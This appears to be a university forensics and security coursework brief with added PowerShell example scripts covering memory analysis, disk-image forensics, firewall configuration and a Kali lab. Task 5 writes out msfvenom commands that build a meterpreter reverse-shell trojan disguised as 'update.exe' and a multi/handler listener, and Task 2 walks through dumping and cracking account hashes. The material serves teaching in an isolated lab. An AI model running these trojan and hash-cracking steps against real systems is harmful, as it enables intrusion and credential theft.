Nov2023 Hdin Studentname A201in CW Ms
A201IN
Forensics and Security Management
Course Work
INSTRUCTIONS TO CANDIDATE
Page 1 of 9
A201IN
Forensics & Security Management
ACAD/006/03
Version: 1.0
Questions.
Task 1
You are given a memory dump file for a forensic investigation. The dump
file was uploaded at https://shorturl.at/msWX1. Use any suitable tool
(for example Volatility) to analyse the following.
(a) Determine the OS and build number of the system from which the dump
was extracted as evidence.
(b) What is the PID of SearchIndexer?
(c) What is the last directory accessed by the user?
(d) There are several suspicious open ports. Which are they? (Give protocol:port.)
(e) Identify malicious code in the captured evidence: take one process from
the list of processes that Volatility flags as possibly containing injected
code, and analyse it in VirusTotal to detect malware and security breaches.
(10 marks)
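A triage script for the five questions above, added here as an example and not part of the coursework brief. It assumes Volatility 3 is installed and callable as `vol` and that the dump is at `.\memdump.raw`; the parsers are exercised on constructed sample output (the sample lines, process names and the expected-port baseline are not taken from the assignment's dump).

```powershell
# Added example (not from the coursework brief). Assumes Volatility 3 is on PATH
# as "vol" and the evidence file is .\memdump.raw; adjust both for your setup.
param([string]$Dump = '.\memdump.raw')

# (a) OS version and build: windows.info prints the NT major/minor version and
#     the kernel build string recovered from the dump.
#   vol -f $Dump windows.info
# (c) Last directory the user browsed: the shellbags plugin (Volatility 2), or
#     RecentDocs / TypedPaths under NTUSER.DAT via windows.registry.printkey.
# (e) Injected-code candidates, then dump one and submit the file hash to VirusTotal:
#   vol -f $Dump windows.malfind
#   vol -f $Dump windows.malfind --pid <PID> --dump ; Get-FileHash -Algorithm SHA256 .\pid.*

# (b) PID of the process whose image name matches, from windows.pslist text output
#     (columns: PID PPID ImageFileName ...). EPROCESS keeps only the first 15
#     characters of the name, so "SearchIndexer.exe" appears as "SearchIndexer.e".
function Get-VolPid {
    param([string[]]$PsList, [string]$Image)
    $want = $Image.Substring(0, [Math]::Min(15, $Image.Length))
    foreach ($line in $PsList) {
        $f = $line.Trim() -split '\s+'
        if ($f.Count -ge 3 -and $f[0] -match '^\d+$' -and $f[2] -like "$want*") { return [int]$f[0] }
    }
    return $null
}

# (d) LISTENING sockets from windows.netscan text output as Proto:Port with the
#     owning process; ports outside a small baseline are flagged for review.
#     Columns: Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
function Get-VolListeners {
    param([string[]]$NetScan, [int[]]$Baseline = @(135, 139, 445, 3389, 5985))  # baseline is an assumption
    foreach ($line in $NetScan) {
        $f = $line.Trim() -split '\s+'
        if ($f.Count -ge 9 -and $f[6] -eq 'LISTENING') {
            [pscustomobject]@{
                Socket     = '{0}:{1}' -f $f[1], $f[3]
                PID        = [int]$f[7]
                Owner      = $f[8]
                Suspicious = -not ($Baseline -contains [int]$f[3])
            }
        }
    }
}

# Constructed sample output in Volatility 3 text layout (not from the assignment's
# dump). For a real run use:  $ps = vol -f $Dump windows.pslist ; $net = vol -f $Dump windows.netscan
$ps = @(
    'PID    PPID   ImageFileName     Offset(V)',
    '4      0      System            0xfa8000c9b040',
    '612    4      smss.exe          0xfa8001a2d040',
    '2612   580    SearchIndexer.e   0xfa8002c1e060'
)
$net = @(
    'Offset      Proto   LocalAddr   LocalPort   ForeignAddr   ForeignPort   State       PID    Owner         Created',
    '0x8a0f5ae0  TCPv4   0.0.0.0     135         0.0.0.0       0             LISTENING   708    svchost.exe   2023-11-01 09:00:00.000000',
    '0x8a1d4f10  UDPv4   0.0.0.0     137         *             0                         4      System        2023-11-01 09:00:00.000000',
    '0x8a1c2b30  TCPv4   0.0.0.0     4444        0.0.0.0       0             LISTENING   2044   update.exe    2023-11-01 09:12:00.000000'
)

'SearchIndexer PID: {0}' -f (Get-VolPid -PsList $ps -Image 'SearchIndexer.exe')
Get-VolListeners -NetScan $net | Format-Table -AutoSize
```

The UDP row never matches because Volatility leaves its State column empty, which shifts the fields; the header row is skipped because its first field is not numeric. Adjust the baseline to the role of the imaged host before calling anything suspicious.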
Task 2
This task requires a virtual machine running Windows Server 2012. After
deploying this VM, modify the Windows Server group policy password settings
as follows so that the required tasks can be performed:
- Minimum password length – 3 characters
- Password must meet complexity requirements – disabled
(a) Create 3 users on Windows Server with the following password requirements.
- The first user account's password should have at least 5 and not more
than 6 characters, with numbers, uppercase and lowercase letters, and
no special characters.
- The second user account's password should have 5 characters, uppercase
and lowercase letters only, with no numbers or special characters.
- The third user account's password length and complexity should meet the
PCI DSS requirements.
(b) Recent security news reported that the Print Spooler service is vulnerable
to remote attack.
- Find one CVE for a remote-attack vulnerability in the Print Spooler
service. Investigate which executable implements and runs that service on
Windows Server.
(c) Take a memory dump of the Windows Server to a file.
(d) Analyse the memory dump file to recover the password hashes of the user
accounts and the process list. Show your workings.
(e) Export the account hashes to a file and crack them with suitable software
to reveal the weak passwords of the first and second user accounts.
(10 marks)
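The Task 2 workflow in one script, added here as an example and not part of the coursework brief. It assumes a stand-alone Windows Server 2012 host (local accounts, PowerShell 3.0) and an elevated prompt; the user names, passwords, acquisition tool path and evidence paths are assumptions. The password check encodes the three specifications so an account is never created with a password that is stronger or weaker than the task asks for; for the PCI DSS account it uses requirement 8.3.6 of PCI DSS v4.0 (at least 12 characters, both numeric and alphabetic). For (b), one widely reported remote Print Spooler bug is the 2021 "PrintNightmare" vulnerability, CVE-2021-34527.

```powershell
# Added example for Task 2 (not from the coursework brief). Assumes a stand-alone
# Windows Server 2012 host (local accounts, PowerShell 3.0) and an elevated prompt;
# user names, passwords and the evidence paths are assumptions.

# --- Password policy: minimum length 3, complexity disabled ---
# Length is a plain switch; complexity lives in the security template, so export
# the current policy with secedit, patch the template and import it again.
net accounts /minpwlen:3
$cfg = Join-Path $env:TEMP 'secpol.cfg'
secedit /export /cfg $cfg /quiet
(Get-Content $cfg) -replace '^PasswordComplexity\s*=\s*\d', 'PasswordComplexity = 0' |
    Set-Content $cfg -Encoding Unicode
secedit /configure /db (Join-Path $env:TEMP 'secpol.sdb') /cfg $cfg /areas SECURITYPOLICY /quiet
gpupdate /force | Out-Null

# --- (a) Validate each password against its specification before creating the account.
#     PCI DSS v4.0 req. 8.3.6: >= 12 characters with both numeric and alphabetic
#     characters (v3.2.1 req. 8.2.3 asked for 7).
function Test-PasswordSpec {
    param([string]$Password, [ValidateSet('User1', 'User2', 'PCI')][string]$Spec)
    $len     = $Password.Length
    $upper   = $Password -cmatch '[A-Z]'
    $lower   = $Password -cmatch '[a-z]'
    $digit   = $Password -match '[0-9]'
    $special = $Password -match '[^A-Za-z0-9]'
    switch ($Spec) {
        'User1' { return ($len -ge 5 -and $len -le 6 -and $upper -and $lower -and $digit -and -not $special) }
        'User2' { return ($len -eq 5 -and $upper -and $lower -and -not $digit -and -not $special) }
        'PCI'   { return ($len -ge 12 -and $digit -and ($upper -or $lower)) }
    }
}

$accounts = @(   # assumed names and passwords
    @{ Name = 'cwuser1'; Spec = 'User1'; Password = 'Ab12c' },
    @{ Name = 'cwuser2'; Spec = 'User2'; Password = 'AbCde' },
    @{ Name = 'cwuser3'; Spec = 'PCI';   Password = 'Winter2023Rain' }
)
foreach ($a in $accounts) {
    if (-not (Test-PasswordSpec -Password $a.Password -Spec $a.Spec)) {
        throw "Password for $($a.Name) does not meet the $($a.Spec) specification"
    }
    $name = $a.Name; $pass = $a.Password
    net user $name $pass /add
}

# --- (b) Which executable backs the Print Spooler service ---
Get-CimInstance Win32_Service -Filter "Name='Spooler'" | Select-Object Name, State, PathName

# --- (c) Memory acquisition (assumed tool and paths); run the tool from a separate
#     tools folder or removable media so the collection disturbs the host as little
#     as possible ---
#   C:\tools\winpmem.exe C:\evidence\server2012.raw
# --- (d) Process list and account hashes from the dump with Volatility 3 (ASCII output,
#     because John does not read the UTF-16 that ">" would produce in PowerShell) ---
#   vol -f C:\evidence\server2012.raw windows.pslist
#   vol -f C:\evidence\server2012.raw windows.hashdump | Set-Content -Encoding Ascii C:\evidence\hashdump.txt

# --- (e) windows.hashdump prints "User rid lmhash nthash"; John and hashcat expect
#     pwdump lines, so convert first, then:  john --format=NT C:\evidence\hashes.pwdump ---
function ConvertTo-Pwdump {
    param([string[]]$HashdumpLines)
    foreach ($line in $HashdumpLines) {
        $f = $line.Trim() -split '\s+'
        if ($f.Count -eq 4 -and $f[1] -match '^\d+$') { '{0}:{1}:{2}:{3}:::' -f $f[0], $f[1], $f[2], $f[3] }
    }
}
# Constructed sample (the two hashes are the well-known empty LM and empty NT hashes)
$sample = @(
    'User      rid    lmhash                            nthash',
    'cwuser1   1001   aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0'
)
ConvertTo-Pwdump $sample | Set-Content -Encoding Ascii (Join-Path $env:TEMP 'hashes.pwdump')
```

On a domain controller the password settings come from the Default Domain Policy rather than the local template, so the secedit step would have to be replaced by editing that GPO.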
Task 3
This task requires you to work with your Windows system for the following:
(Show your workings with related screenshots and commands.)
(a) Identify a built-in Windows tool that shows how much network bandwidth
each application is using and which destination it is sending to.
(b) Find at least three open (listening) ports on the IP address 8.8.8.8.
(c) Turn on Windows Firewall logging for all network profiles. The log size
should be at least 10 MB, the log should be stored under the C:\Firewall-Log\
directory, and logging should be enabled for all packets (allowed and dropped).
(d) Block all web traffic from your Windows system to the website
testphp.vulnweb.com with a Windows Firewall rule, as required by your
organisation's policy, and analyse the DROP entries for testphp.vulnweb.com
in the firewall log.
(e) Create a virtual disk of 2 GB and mount it with drive letter "V".
Encrypt this drive with BitLocker and print or export the recovery key file
to a different storage location.
(10 marks)
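The five parts of Task 3 as one script, added here as an example and not part of the coursework brief. It assumes an elevated PowerShell on Windows 8.1 / Server 2012 R2 or later (for `Test-NetConnection` and the NetSecurity, DnsClient and BitLocker modules); the file paths, the D: drive used for the recovery key and the firewall log lines fed to the parser are assumptions. The log parser reads the field order from the `#Fields:` header that Windows writes at the top of pfirewall.log.

```powershell
# Added example for Task 3 (not from the coursework brief). Assumes an elevated
# PowerShell on Windows 8.1 / Server 2012 R2 or later; paths, the D: drive and
# the sample log lines are assumptions.

# (a) Built-in per-process bandwidth and destination view: resmon.exe, Network tab
#     ("Processes with Network Activity" and "TCP Connections").

# (b) Probe well-known ports on 8.8.8.8 (TCP only; Test-NetConnection cannot test UDP)
foreach ($p in 53, 80, 443, 853) {
    $r = Test-NetConnection -ComputerName 8.8.8.8 -Port $p -WarningAction SilentlyContinue
    '8.8.8.8:{0}/tcp open = {1}' -f $p, $r.TcpTestSucceeded
}

# (c) Logging for Domain, Private and Public: >= 10 MB, under C:\Firewall-Log\,
#     both allowed and dropped packets
New-Item -ItemType Directory -Path 'C:\Firewall-Log' -Force | Out-Null
Set-NetFirewallProfile -All -LogFileName 'C:\Firewall-Log\pfirewall.log' `
    -LogMaxSizeKilobytes 10240 -LogAllowed True -LogBlocked True

# (d) Firewall rules match addresses, not names: resolve the host, block the web
#     ports to every A record, and re-resolve when the site's address changes.
$ips = @(Resolve-DnsName -Name 'testphp.vulnweb.com' -Type A |
         Where-Object { $_.Type -eq 'A' } | ForEach-Object IPAddress)
New-NetFirewallRule -DisplayName 'Policy: block testphp.vulnweb.com' -Direction Outbound `
    -Action Block -Protocol TCP -RemotePort 80, 443 -RemoteAddress $ips | Out-Null

# DROP entries from pfirewall.log whose destination is one of $Targets.
# Field order from the "#Fields:" header: date time action protocol src-ip dst-ip
# src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
function Get-DroppedTo {
    param([string[]]$LogLines, [string[]]$Targets)
    foreach ($line in $LogLines) {
        if ([string]::IsNullOrWhiteSpace($line) -or $line.StartsWith('#')) { continue }
        $f = $line -split ' '
        if ($f.Count -ge 17 -and $f[2] -eq 'DROP' -and $Targets -contains $f[5]) {
            [pscustomobject]@{
                Time  = $f[0] + ' ' + $f[1]
                Proto = $f[3]
                Src   = $f[4] + ':' + $f[6]
                Dst   = $f[5] + ':' + $f[7]
                Path  = $f[16]
            }
        }
    }
}

# Constructed log lines; 203.0.113.5 stands in for the resolved address
$sampleLog = @(
    '#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path',
    '2023-11-20 10:15:01 ALLOW TCP 192.168.56.10 198.51.100.7 51521 443 0 - 0 0 0 - - - SEND',
    '2023-11-20 10:15:03 DROP TCP 192.168.56.10 203.0.113.5 51522 80 52 S 123456 0 65535 - - - SEND',
    '2023-11-20 10:15:04 DROP TCP 192.168.56.10 203.0.113.5 51523 443 52 S 123457 0 65535 - - - SEND'
)
Get-DroppedTo -LogLines $sampleLog -Targets '203.0.113.5' | Format-Table -AutoSize
# Live check after browsing to the site:
#   Get-DroppedTo -LogLines (Get-Content 'C:\Firewall-Log\pfirewall.log') -Targets $ips

# (e) 2 GB virtual disk mounted as V:, then BitLocker with a recovery password
#     written to a different drive
New-Item -ItemType Directory -Path 'C:\vdisk' -Force | Out-Null
$dpScript = Join-Path $env:TEMP 'vdisk.txt'
@'
create vdisk file=C:\vdisk\vol_v.vhd maximum=2048 type=expandable
attach vdisk
create partition primary
format fs=ntfs quick label=VDISK
assign letter=V
'@ | Set-Content $dpScript -Encoding Ascii
diskpart /s $dpScript | Out-Null
$pw = Read-Host -AsSecureString 'Password for V:'
Enable-BitLocker -MountPoint 'V:' -PasswordProtector -Password $pw | Out-Null
Add-BitLockerKeyProtector -MountPoint 'V:' -RecoveryPasswordProtector | Out-Null
$rp = (Get-BitLockerVolume -MountPoint 'V:').KeyProtector |
      Where-Object { $_.KeyProtectorType -eq 'RecoveryPassword' }
@("BitLocker recovery key for V: ($env:COMPUTERNAME)",
  "Identifier: $($rp.KeyProtectorId)",
  "Recovery key: $($rp.RecoveryPassword)") | Set-Content 'D:\bitlocker-V-recovery.txt'
```

The recovery key file must not stay on the encrypted volume or on the same disk as the VHD, which is why the last line writes to another drive; `manage-bde -protectors -get V:` shows the same identifier and key for the screenshot.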
Task 4
A crime took place in an office, and a related computer was seized and
handled in compliance with chain of custody. A disk image of that computer's
hard disk drive was taken for further investigation. The disk image was
uploaded at the following links:
https://download.vulnhub.com/ha/sherlock.ova
https://drive.google.com/file/d/1UQMOphUUezNWwwTXGvdcMO1aLboETt6w/view?usp=sharing
(a) Download the file from either link and import it into VMware Workstation
as a virtual machine in a directory. Then locate the virtual disk file
(".vmdk") in that directory on your machine.
(b) Set up and use disk forensics software to investigate the disk image file
for the following:
i. What operating system is installed in the disk image?
ii. One waveform audio (WAV) file that may contain a message.
iii. A folder containing 15 pictures, which may reveal images of an online
victim.
iv. Three email message files received from the criminal; parts of the
filenames are:
1601397957.V801Ie2533M1xxxxxxxxxxx
1601397722.V801Ie252eM8xxxxxxxxxxx
1601397590.M663026xxxxxxxxxxxxxx
v. Two text files (10_Points.txt and 25_Points.txt) that show you have
found some hints.
(10 marks)
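A search script for items i to v of (b), added here as an example and not part of the coursework brief. It assumes the .vmdk from (a) has been opened read-only in a forensic tool (Autopsy and FTK Imager read VMDK directly; `qemu-img convert -f vmdk -O raw` produces a raw image for tools that do not) and that its file system has been exported or mounted so the image root is visible at `E:\`; the drive letter, the report path and the picture extensions are assumptions. Hits are reported with a SHA-256 so each finding ties back to the evidence, the WAV check reads the RIFF/WAVE header rather than trusting the extension, and the Maildir-style message names are decoded to the delivery time their leading number encodes.

```powershell
# Added example for Task 4 (b) (not from the coursework brief). Assumes the image's
# file system is mounted or exported read-only at E:\; drive letter and report
# path are assumptions. Needs PowerShell 4 or later for Get-FileHash.
param([string]$Root = 'E:\', [string]$Report = 'C:\case\findings.csv')

$epoch = New-Object DateTime 1970, 1, 1, 0, 0, 0, ([DateTimeKind]::Utc)

# Every hit is recorded with its SHA-256 so the report entry ties back to the evidence.
function New-Finding {
    param([string]$Item, [System.IO.FileInfo]$File, [string]$Note = '')
    [pscustomobject]@{
        Item   = $Item
        Path   = $File.FullName
        Bytes  = $File.Length
        SHA256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $File.FullName).Hash
        Note   = $Note
    }
}

# i. Operating system: look for the tell-tale root layout instead of guessing
function Get-OsHint {
    param([string]$Root)
    if (Test-Path (Join-Path $Root 'Windows\System32\config\SOFTWARE')) { return 'Windows (SOFTWARE hive present)' }
    $rel = Join-Path $Root 'etc\os-release'
    if (Test-Path $rel) { return 'Linux: ' + ((Get-Content $rel) -match '^PRETTY_NAME=' | Select-Object -First 1) }
    return 'unknown (no Windows hive or /etc/os-release found)'
}

# ii. A real WAV starts with "RIFF....WAVE"; checking the header finds renamed files too
function Test-WavHeader {
    param([string]$Path)
    try {
        $fs = [System.IO.File]::OpenRead($Path)
        $b  = New-Object byte[] 12
        $n  = $fs.Read($b, 0, 12)
        $fs.Close()
        return ($n -eq 12 -and
                [Text.Encoding]::ASCII.GetString($b, 0, 4) -eq 'RIFF' -and
                [Text.Encoding]::ASCII.GetString($b, 8, 4) -eq 'WAVE')
    } catch { return $false }
}

$files = Get-ChildItem -LiteralPath $Root -Recurse -File -Force -ErrorAction SilentlyContinue
$findings = @()

$files | Where-Object { Test-WavHeader $_.FullName } |
    ForEach-Object { $findings += New-Finding 'ii. WAV audio' $_ }

# iii. A folder holding exactly 15 picture files (by extension)
$picExt = '.jpg', '.jpeg', '.png', '.gif', '.bmp'
$files | Where-Object { $picExt -contains $_.Extension.ToLower() } |
    Group-Object DirectoryName | Where-Object Count -eq 15 | ForEach-Object {
        $findings += [pscustomobject]@{ Item = 'iii. 15-picture folder'; Path = $_.Name; Bytes = 0; SHA256 = ''; Note = "$($_.Count) pictures" }
    }

# iv. The given name fragments follow the Maildir convention: the leading number
#     is the Unix time at which the message was delivered.
$mailPrefix = '1601397957.V801Ie2533M1', '1601397722.V801Ie252eM8', '1601397590.M663026'
$files | Where-Object { $n = $_.Name; @($mailPrefix | Where-Object { $n.StartsWith($_) }).Count -gt 0 } |
    ForEach-Object {
        $secs = [int64](($_.Name -split '\.')[0])
        $findings += New-Finding 'iv. email from criminal' $_ ('delivered ' + $epoch.AddSeconds($secs).ToString('u'))
    }

# v. Hint files
$files | Where-Object { $_.Name -in '10_Points.txt', '25_Points.txt' } |
    ForEach-Object { $findings += New-Finding 'v. hint file' $_ }

'Operating system: ' + (Get-OsHint $Root)
New-Item -ItemType Directory -Path (Split-Path $Report) -Force | Out-Null
$findings | Export-Csv -Path $Report -NoTypeInformation
$findings | Format-Table Item, Path, Note -AutoSize
```

Work from the read-only mount or an exported copy only; hashing and listing must never touch the original .vmdk, and the CSV doubles as the worked evidence list for the report.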
Task 5
This task involves penetration testing of a Windows system on which the
Windows Defender service and Windows Security are disabled. Use "Kali
Linux" and any "Windows" system.
(a) Assign the network settings and allow the firewall rules needed on the
"Kali Linux" and "Windows" systems so that the two have network
connectivity. (You may use the Host-only setting for the VMs' network
adapters.)
(b) Set up a shared folder and the Remote Desktop service on the Windows
system.
(c) Port-scan the "Windows" system with nmap for TCP ports 21, 25, 53, 80,
389, 443, 445, 465, 1433 and 3389. Show which ports are open.
(d) Create a trojan file in Kali Linux and upload it to the Windows system.
(e) Test the exploitation with the multi/handler exploit by opening the
trojan file. Show the result and, if the exploit succeeds, show the system
information and the active user ID.
(10 marks)
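The Windows-side preparation for (a) and (b), with the Kali commands for (c) to (e) noted as comments, added here as an example and not part of the coursework brief. It assumes a host-only network with Kali at 192.168.56.20 and the Windows target at 192.168.56.10; the addresses, share name, lab user and payload file name are assumptions. The lab rules are scoped to Kali's address so that a host with Defender off is not exposed to anything else on the adapter, and the last function shows what the successful session looks like from the target side.

```powershell
# Added example for Task 5 (not from the coursework brief). Assumes a host-only
# network, Kali at 192.168.56.20 and the target at 192.168.56.10; names and
# addresses are assumptions. Only for an isolated lab VM.
param([string]$Kali = '192.168.56.20')

# (a) Let Kali reach the target: allow ICMP echo requests from Kali only
New-NetFirewallRule -DisplayName 'Lab: ICMPv4 echo from Kali' -Direction Inbound `
    -Protocol ICMPv4 -IcmpType 8 -RemoteAddress $Kali -Action Allow | Out-Null

# (b) Shared folder over SMB and Remote Desktop, both scoped to Kali's address
New-Item -ItemType Directory -Path 'C:\LabShare' -Force | Out-Null
New-SmbShare -Name 'LabShare' -Path 'C:\LabShare' -ChangeAccess 'Everyone' | Out-Null
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
    -Name fDenyTSConnections -Value 0
foreach ($grp in 'File and Printer Sharing', 'Remote Desktop') {
    Enable-NetFirewallRule -DisplayGroup $grp
    Get-NetFirewallRule -DisplayGroup $grp | Set-NetFirewallRule -RemoteAddress $Kali
}

# (c) The target's own view of the ports nmap will probe, to compare with the scan:
#   nmap -Pn -p 21,25,53,80,389,443,445,465,1433,3389 192.168.56.10
function Get-LocalListening {
    param([int[]]$Ports = @(21, 25, 53, 80, 389, 443, 445, 465, 1433, 3389))
    $open = (Get-NetTCPConnection -State Listen).LocalPort
    foreach ($p in $Ports) { [pscustomobject]@{ Port = $p; Listening = ($open -contains $p) } }
}
Get-LocalListening | Format-Table -AutoSize

# (d) Build the trojan on Kali and drop it on the share:
#   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.20 LPORT=4444 -f exe -o update.exe
#   smbclient //192.168.56.10/LabShare -U labuser -c 'put update.exe'
# (e) Start the handler on Kali, then run C:\LabShare\update.exe on Windows:
#   msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.56.20; set LPORT 4444; run"
#   meterpreter > sysinfo
#   meterpreter > getuid

# Target-side view while the session is open: an established connection to Kali
# owned by a process that is neither the RDP nor the SMB service is the reverse shell.
function Get-ReverseShellCandidates {
    param([string]$Attacker)
    Get-NetTCPConnection -State Established |
        Where-Object { $_.RemoteAddress -eq $Attacker } |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Local   = '{0}:{1}' -f $_.LocalAddress, $_.LocalPort
                Remote  = '{0}:{1}' -f $_.RemoteAddress, $_.RemotePort
                PID     = $_.OwningProcess
                Process = $proc.ProcessName
                Path    = $proc.Path
            }
        }
}
Get-ReverseShellCandidates -Attacker $Kali | Format-Table -AutoSize
```

Run `Get-ReverseShellCandidates` after `getuid` succeeds: the row whose Path is `C:\LabShare\update.exe` and whose remote port is 4444 is the evidence a defender would use to find the same session.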
Students must print this cover sheet and attach it to the assignment/project report before submission to the respective tutor.
Date of Submission:
Name of Lecturer:
Justification:
Collusion check:
Marking guide (partial): Learning Outcome / Marking Guide, Weightage, 1st Marker Mark, 2nd Marker Mark, Final Mark
Task 3
(b) Three open or listening ports (:80) - 1
(c) Enable firewall log - 2
(d) Block and check firewall log - 3
(e) BitLocker drive - 3
Task 4 - Investigation of the disk image file
Module Code & Name: A201IN – Forensics and Security Management
Assessment Title: Coursework – HDIN A201IN
Date completed:
Staff Declaration: We agree that work to be marked anonymously will be treated as such until marking and internal moderation has been completed.